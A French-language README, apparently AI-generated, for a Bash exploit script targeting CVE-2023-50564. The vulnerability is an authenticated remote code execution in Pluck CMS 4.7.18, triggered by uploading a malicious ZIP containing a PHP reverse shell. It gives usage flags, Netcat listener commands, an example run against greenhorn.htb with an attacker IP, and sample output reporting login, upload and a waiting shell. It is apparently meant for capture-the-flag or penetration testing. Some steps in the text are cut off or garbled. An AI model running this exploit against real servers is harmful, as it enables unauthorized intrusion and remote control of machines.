
Exploit Bash automatisant l'exécution de code à distance authentifiée dans Pluck CMS 4.7.18 via un téléchargement de ZIP malveillant, déclenchant un shell inverse PHP pour CVE-2023-50564.
Ce script exploite une vulnérabilité d'exécution de code à distance (RCE) dans Pluck CMS v4.7.18. La vulnérabilité permet à un utilisateur malveillant de télécharger un fichier PHP malveillant sur le serveur et de l'exécuter, obtenant ainsi une exécution de commandes à distance sur la machine cible.
Le script automatise l'ensemble du processus en :
Remarque : Le script nécessite un écouteur Netcat sur la machine de l'attaquant pour recevoir le reverse shell.
Avant d'exécuter le script, assurez-vous des points suivants :
./CVE-2023-50564 -h <host> -P <password> -i <IP> -p <port>
-h <host> : L'hôte cible (ex. greenhorn.htb).-P <password> : Le mot de passe du panneau d'administration de Pluck CMS (ex. abcd123).-i <IP> : L'adresse IP de l'attaquant pour recevoir le reverse shell.-p <port> : Le port sur lequel l'écouteur Netcat écoute pour capturer le reverse shell../CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
Configurer l'écouteur Netcat : Sur la machine de l'attaquant, démarrez un écouteur Netcat sur le port spécifié :
nc -nvlp <port>
Par exemple :
nc -nvlp 9001
Exécuter le script : Fournissez les paramètres requis au script, y compris l'hôte, le mot de passe, l'adresse IP et le port.
./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
Exécution du script :
love.php)."RCE is waiting for you, please go take a look.", et le script se termine après avoir suivi le temps écoulé.Accéder à la cible : Une fois le reverse shell déclenché, la connexion apparaîtra dans votre écouteur Netcat, vous donnant un accès distant à la machine cible.
image
./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
Netcat listener detected on port 9001.
Downloading reverse shell PHP exploit...
updating: love.php (deflated 60%)
Exploit zipped as loverce.zip and original PHP file removed.
Extracted Cookie: PHPSESSID=somecookievalue
Login successful!
ZIP file uploaded successfully.
RCE is waiting for you, please go take a look.
Script terminated. Total time taken: 70 seconds.
Vous pouvez installer curl et netcat en utilisant les commandes suivantes s'ils ne sont pas installés :
sudo apt update
sudo apt install curl netcat
sudo yum install curl nc
Ce script est destiné uniquement à des fins éducatives et de tests de pénétration autorisés. Toute utilisation non autorisée de ce script est illégale et contraire à l'éthique. Obtenez toujours une autorisation appropriée avant d'exploiter une vulnérabilité sur un système.
Faites-moi savoir si vous souhaitez toute autre personnalisation ou clarification dans le README !